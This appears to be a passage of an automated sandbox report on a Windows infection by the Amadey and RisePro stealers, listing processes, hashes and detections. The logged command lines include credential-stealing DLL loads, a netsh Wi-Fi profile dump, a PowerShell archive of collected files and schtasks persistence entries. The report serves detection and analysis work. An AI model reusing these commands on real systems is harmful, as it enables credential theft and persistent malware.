                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                                                                                                                                                      Imagebase:0x7ff6e2750000
                                                                                                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                      Start time:03:29:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                      Imagebase:0x7ff6632b0000
                                                                                                                                                                                                                                      File size:96'768 bytes
                                                                                                                                                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                      Start time:03:29:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                      Start time:03:29:07
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                      Start time:03:29:07
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                      Start time:03:29:07
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                                                                                      File size:61'440 bytes
                                                                                                                                                                                                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                      Start time:03:29:10
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000054001\amert.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
                                                                                                                                                                                                                                      Imagebase:0x360000
                                                                                                                                                                                                                                      File size:1'905'152 bytes
                                                                                                                                                                                                                                      MD5 hash:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000E.00000003.2792595641.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 43%, Virustotal
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                      Start time:03:29:13
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Imagebase:0x70000
                                                                                                                                                                                                                                      File size:1'905'152 bytes
                                                                                                                                                                                                                                      MD5 hash:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000F.00000003.2831581300.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000F.00000002.2880613801.0000000000071000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 43%, Virustotal
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                      Start time:03:29:14
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                                                                                                                                                                                                                                      Imagebase:0xca0000
                                                                                                                                                                                                                                      File size:1'166'336 bytes
                                                                                                                                                                                                                                      MD5 hash:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 33%, Virustotal
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                      Start time:03:29:14
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                      Start time:03:29:15
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                      Start time:03:29:15
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                      Start time:03:29:19
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                                                                                                                                                                                                                                      Imagebase:0xaa0000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 51%, Virustotal, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                                                                                      File size:187'904 bytes
                                                                                                                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                                                                                      File size:187'904 bytes
                                                                                                                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                      Start time:03:29:22
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                      Start time:03:29:23
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      Imagebase:0x890000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 51%, Virustotal, Browse
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                      Start time:03:29:23
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      Imagebase:0x890000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.3072924932.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                      Start time:03:29:24
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                                                                                                                                                                                                                      Imagebase:
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                                                      Start time:03:29:27
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                                                                                                                                                                                                                                      Imagebase:0xca0000
                                                                                                                                                                                                                                      File size:1'166'336 bytes
                                                                                                                                                                                                                                      MD5 hash:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                      Start time:03:29:28
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                                                      Start time:03:29:29
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                      Start time:03:29:29
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                      Start time:03:29:35
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                                                                                                                                                                                                                                      Imagebase:0xaa0000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:true

